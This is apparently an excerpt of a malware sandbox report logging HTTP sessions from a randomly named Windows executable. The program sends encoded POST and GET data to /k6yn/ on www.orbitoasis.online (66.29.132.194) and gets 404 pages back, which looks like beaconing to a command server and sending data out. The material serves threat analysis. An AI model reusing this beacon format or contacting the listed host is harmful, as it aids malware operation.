                                                                      Data Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 1350ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:19.609481096 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:19.609491110 CET | 1236 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:19.609503984 CET | 1236 | IN | Data Raw: 2c b0 33 da 10 c0 a8 15 ba 69 cf c7 65 5c af 9b 80 a5 37 34 66 12 e2 a9 83 09 bd 5b 14 1d e9 67 27 7b 8b e8 9c bf 24 4e d8 02 17 20 3d 1e ee 44 98 68 32 7b 54 ec 23 0a a7 f3 06 4f 0f de 0a 4e 03 6d 4c a2 c0 35 cb a3 8a 58 ba db 4e ed ea 28 f5 eb
                                                                      Data Ascii: ,3ie\74f[g'{$N =Dh2{T#ONmL5XN("JUb2},$H0)fGHl(<z{x;:2Ng9KP4tfoYwUdnbz#vqPnnN*Hs2ev&4A1pe|'4<z]dvV-NZ).RiAw
                                                                      Jan 8, 2025 16:13:19.609514952 CET | 292 | IN | Data Raw: 8c 79 b6 b6 b7 5c f3 dd 00 fe 09 f9 ab 43 5d 67 97 3f 39 cb 35 fb 1f 62 f6 33 4c fd e9 05 54 7f fe 54 12 97 c3 be d7 e3 f5 6e cf c3 7f 24 2d 20 ca 77 02 78 16 d3 dd b7 47 f8 b3 55 8f f0 47 aa b9 01 d3 07 7c 5d 39 86 57 16 1f 9f 0b 7a ef 85 fd cb
                                                                      Data Ascii: y\C]g?95b3LTTn$- wxGUG|]9Wzzdhn5J~/6H+cu:.=Vwti&jOCO*{&QS72S'y[_8/7LOwr70~k^w/PBGkjYm


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.4 | 49742 | 66.29.132.194 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:21.579884052 CET | 790 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 2b 6c 66 74 6f 36 41 46 78 45 70 4f 38 2f 76 64 32 4f 34 50 57 51 73 35 39 2f 41 69 2f 31 58 77 34 3d
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrr+lfto6AFxEpO8/vd2O4PWQs59/Ai/1Xw4=
                                                                      Jan 8, 2025 16:13:22.180773020 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:22 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:22.180787086 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:22.180795908 CET | 448 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:22.180807114 CET | 1236 | IN | Data Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                                      Jan 8, 2025 16:13:22.180825949 CET | 1075 | IN | Data Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.4 | 49745 | 66.29.132.194 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:24.128179073 CET | 10872 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 65 76 77 4a 67 36 50 73 71 4f 58 2f 70 79 74 49 64 6b 45 50 6b 67 4a 67 4f 52 45 73 49 79 61 6b 50 66 6e 68 37 6f 59 52 68 2f 44 56 48 51 68 6e 49 68 6f 7a 4f 39 52 59 6a 53 78 71 56 32 56 2b 5a 35 7a 63 38 4b 42 61 32 34 6c 44 47 5a 35 6a 6b 35 66 4a 66 49 4a 4c 48 68 53 48 32 6e 4d 72 35 4f 68 55 48 7a 5a 74 4e 30 71 75 32 2b 66 57 37 6a 41 65 6c 6d 59 52 59 57 52 37 52 6a 79 52 48 6b 4d 68 4f 70 6d 46 76 4c 41 75 32 67 54 76 54 37 2b 42 43 4e 6d 43 48 66 64 4b 5a 62 72 31 67 79 35 52 [TRUNCATED]
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjevwJg6PsqOX/pytIdkEPkgJgOREsIyakPfnh7oYRh/DVHQhnIhozO9RYjSxqV2V+Z5zc8KBa24lDGZ5jk5fJfIJLHhSH2nMr5OhUHzZtN0qu2+fW7jAelmYRYWR7RjyRHkMhOpmFvLAu2gTvT7+BCNmCHfdKZbr1gy5RI4RHB2kWRPf3F9ApplqzcxZPHpjShW6pnlEKhWXZEE7WQLd6UXkmFRqd5ZHezkeLwM1zfFNUwcCcdVX3Rxpi+QlQ8dnlXR8xMX5uAWkYiqVx3OORwH2kKWwDRqAFzIEAlgt2x6wPQvP7EC9j8VyKsxDYxn5++F434qrMyuLgo6pkpGlbpyOq0U+lO7UNoRjc2+7naG5jHrMkDTj4GdC9Zv4FyeU+VJdsfWIwV50qeBMVjsq35rdMxLhLzYFlocFGIm+Ws/wBtZKS/6uBhiLC8/v5RkGpgUIyeBnIE+AlySqau+wEqOJ5eR6m4tpQZaxihvbug/7XDAhzaNkhGQm5aIlW2S3WrHZEqH/CEvb8h2IjAduyJbkahMk1JfJrR2IJDhx4R055MlAwynx+4tRP8jjTgF3+To+xnWIWWqjesdO3sOaTse09VEs0pqGE05oynYVGAAh2eoJg/SFsixOspD2CuDmej5GoBzyISd0HTwwLCf8zE+3ujP7/F1W7N/0wi9EbOKiO/smUpehzjvLbepvurDkmHGeQVXtgBxd4oYQLEgRiGC3QJWgs6TaHarcpDzfJL+FEbj4fuPLWL0SzAEWxV+uAL0LzoxJUrAbj6E7QN7EIo6yo3fjslOIuyhtNgGzp0KEI9WhwGKUR8xGYyHuKXodDpNBc+e [TRUNCATED]
                                                                      Jan 8, 2025 16:13:24.849272013 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:24 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Jan 8, 2025 16:13:24.849287987 CET | 1236 | IN | Data Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Jan 8, 2025 16:13:24.849298954 CET | 448 | IN | Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Jan 8, 2025 16:13:24.849308968 CET | 1236 | IN | Data Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                                      Jan 8, 2025 16:13:24.849328995 CET | 1075 | IN | Data Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      8 | 192.168.2.4 | 49761 | 66.29.132.194 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:26.669754982 CET | 493 | OUT | GET /k6yn/?F4=Q0yHy&xP7x=tNpa1p20+8HvGGTFO8I9keuPU7tOKng9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV4TqG+qZ72KE+To3i0rNZuThB0u31oMhQ62I= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:13:27.395282030 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Wed, 08 Jan 2025 15:13:27 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                      Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                      Jan 8, 2025 16:13:27.395308018 CET | 224 | IN | Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                      Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
                                                                      Jan 8, 2025 16:13:27.395334005 CET1236INData Raw: 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20
                                                                      Data Ascii: ound-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; m
                                                                      Jan 8, 2025 16:13:27.395347118 CET1236INData Raw: 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                                      Data Ascii: dress { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0
                                                                      Jan 8, 2025 16:13:27.395409107 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline;
                                                                      Jan 8, 2025 16:13:27.395469904 CET | 1236 | IN | Data Ascii: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not
